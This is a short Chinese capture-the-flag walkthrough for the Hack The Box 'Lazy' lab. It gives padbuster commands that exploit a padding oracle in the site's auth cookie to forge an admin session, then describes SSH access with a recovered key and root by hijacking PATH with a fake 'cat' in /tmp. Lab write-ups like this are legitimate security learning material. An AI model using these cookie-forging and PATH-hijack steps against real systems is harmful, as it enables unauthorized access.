当前位置: 代码迷 >> 综合 >> Hack the box靶机 Lazy
  详细解决方案

Hack the box靶机 Lazy

热度:92   发布时间:2023-12-03 12:48:18.0

在这里插入图片描述
在这里插入图片描述

提示先创建一个账号

在这里插入图片描述

注册后登录
没啥用啊
抓包看看

在这里插入图片描述

将Auth cookie 的值更改为lienzhen
收到错误消息
容易受到Oracle Padding Attack的攻击。
Padding Oracle Attack

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

padbuster http://10.10.10.18/login.php XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf 8 -cookies auth=XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf -encoding 0
padbuster http://10.10.10.18/login.php XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf 8 -cookies auth=XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf -encoding 0  -plaintext user=admin

反向推出admin的值用来登录

在这里插入图片描述
在这里插入图片描述

数值要修改两次
得到一个id_rsa

在这里插入图片描述
在这里插入图片描述

ssh登录成功
看到文件夹下有backup文件

在这里插入图片描述
在这里插入图片描述

脚本调用了cat命令
在/tmp中写一个cat
加入环境变量中
运行
拿到权限

  相关解决方案

代码迷 - 您身边的软件异常,代码异常,编程异常助手(发现,解决,分享)
Copyright © 2009-2013 DAIMAMI.COM. All rights reserved.